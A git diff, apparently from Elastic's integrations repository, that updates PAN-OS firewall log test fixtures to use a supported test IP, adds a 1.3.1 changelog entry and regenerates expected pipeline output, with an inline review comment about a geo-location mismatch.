PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 diff --git a/packages/panw/changelog.yml b/packages/panw/changelog.yml index b137a2a3196..deb834ec225 100644 --- a/packages/panw/changelog.yml +++ b/packages/panw/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log index 421c6f796a6..36604b7b0e2 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log 
@@ -31,4 +31,4 @@ Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:20
 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,general,1,2012/04/09 03:21:53,,unknown,,0,0,general,informational,Config installed,821,0x0
 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,ras,0,2012/04/09 03:21:53,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0
 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,vpn,0,2012/04/09 03:21:53,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json
index 82c3153546a..b8d4ac9e903 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json
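Review bot: The added TRAFFIC line swaps the destination to `175.16.199.1` but keeps the record's own destination-location column as `United States` in its trailing fields, while the regenerated expected output (hunk `-961,27` of the expected JSON) now resolves that address to China/Jilin, AS 4837, and ends up with `"name": "United States"` sitting next to `"country_name": "China"` under `destination.geo`. If that location column is what feeds `destination.geo.name` (it appears to be, but the pipeline is not in this diff), the fixture is now internally contradictory; consider changing the column on the sample line to agree with the GeoIP result, or leaving it and documenting in the sample why the two differ. Separately, every event in the same expected file changes only `event.ingested` (hunks `-12,7` through `-940,7`), which suggests that field is not masked as a dynamic field in the pipeline test config; masking it would keep future fixture regenerations limited to the lines that actually changed.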
@@ -12,7 +12,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081338075Z", + "ingested": "2021-12-09T13:42:57.366911400Z", "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,CONFIG,0,0,2012/02/25 00:51:50,192.168.0.2,,set,admin,Web,Succeeded, config shared local-user-database user badguy,0,0x0", "created": "2013-03-25T23:58:57.000-04:00", "timezone": "America/New_York", @@ -41,7 +41,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081376999Z", + "ingested": "2021-12-09T13:42:57.366915600Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:53:22,192.168.0.2,,set,admin,Web,Succeeded, config mgt-config users badguy,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -70,7 +70,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081389770Z", + "ingested": "2021-12-09T13:42:57.366922Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:53:40,192.168.0.2,,commit,admin,Web,Submitted,,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -99,7 +99,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081400341Z", + "ingested": "2021-12-09T13:42:57.366928400Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,routing,0,2012/02/25 00:53:53,,routed-config-p1-success,,0,0,general,informational,Route daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", 
@@ -128,7 +128,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081410710Z", + "ingested": "2021-12-09T13:42:57.366932800Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,vpn,0,2012/02/25 00:53:56,,ike-config-p1-success,,0,0,general,informational,IKE daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -157,7 +157,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081421040Z", + "ingested": "2021-12-09T13:42:57.366937100Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,routing,0,2012/02/25 00:54:16,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -186,7 +186,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081431415Z", + "ingested": "2021-12-09T13:42:57.366942Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,ras,0,2012/02/25 00:54:16,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -215,7 +215,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081441683Z", + "ingested": "2021-12-09T13:42:57.366946400Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:57:17,192.168.0.2,,edit,badguy,Web,Succeeded, vsys vsys1 profiles url-filtering monzyspolicy,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", 
@@ -244,7 +244,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081452123Z", + "ingested": "2021-12-09T13:42:57.366950100Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:57:36,192.168.0.2,,commit,badguy,Web,Submitted,,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -273,7 +273,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081462922Z", + "ingested": "2021-12-09T13:42:57.366955Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,routing,0,2012/02/25 00:57:49,,routed-config-p1-success,,0,0,general,informational,Route daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -302,7 +302,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081479442Z", + "ingested": "2021-12-09T13:42:57.366959500Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,vpn,0,2012/02/25 00:57:52,,ike-config-p1-success,,0,0,general,informational,IKE daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -331,7 +331,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081491732Z", + "ingested": "2021-12-09T13:42:57.366964400Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,routing,0,2012/02/25 00:58:12,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", 
@@ -360,7 +360,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081502396Z", + "ingested": "2021-12-09T13:42:57.366968300Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,vpn,0,2012/02/25 00:58:12,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -389,7 +389,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081512809Z", + "ingested": "2021-12-09T13:42:57.366973100Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,ras,0,2012/02/25 00:58:12,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -418,7 +418,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081523206Z", + "ingested": "2021-12-09T13:42:57.366979100Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,general,1,2012/02/25 00:58:14,,unknown,,0,0,general,informational,Config installed,909,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -447,7 +447,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081533705Z", + "ingested": "2021-12-09T13:42:57.366986600Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,general,0,2012/02/25 00:59:36,,general,,0,0,general,informational,Log type config cleared by user badguy ,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", 
@@ -476,7 +476,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081544298Z", + "ingested": "2021-12-09T13:42:57.366992800Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,general,1,2012/04/10 03:11:57,,unknown,,0,0,general,informational,Config installed,884,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -505,7 +505,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081554745Z", + "ingested": "2021-12-09T13:42:57.366998700Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,ras,0,2012/04/10 03:11:56,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -534,7 +534,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081565139Z", + "ingested": "2021-12-09T13:42:57.367003500Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,vpn,0,2012/04/10 03:11:56,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -563,7 +563,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081576853Z", + "ingested": "2021-12-09T13:42:57.367008400Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,routing,0,2012/04/10 03:11:56,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", 
@@ -592,7 +592,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081587851Z", + "ingested": "2021-12-09T13:42:57.367014400Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,ras,0,2012/04/10 03:06:11,,rasmgr-config-p1-success,,0,0,general,informational,RASMGR daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -621,7 +621,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081598239Z", + "ingested": "2021-12-09T13:42:57.367018900Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,routing,0,2012/04/10 03:06:00,,routed-config-p1-success,,0,0,general,informational,Route daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -650,7 +650,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081608557Z", + "ingested": "2021-12-09T13:42:57.367023800Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,general,1,2012/04/09 09:02:53,,unknown,,0,0,general,informational,Config installed,840,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -679,7 +679,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081619146Z", + "ingested": "2021-12-09T13:42:57.367029900Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,ras,0,2012/04/09 09:02:52,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", 
@@ -708,7 +708,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081629540Z", + "ingested": "2021-12-09T13:42:57.367034600Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,vpn,0,2012/04/09 09:02:52,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -737,7 +737,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081640004Z", + "ingested": "2021-12-09T13:42:57.367039600Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,routing,0,2012/04/09 09:02:52,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": 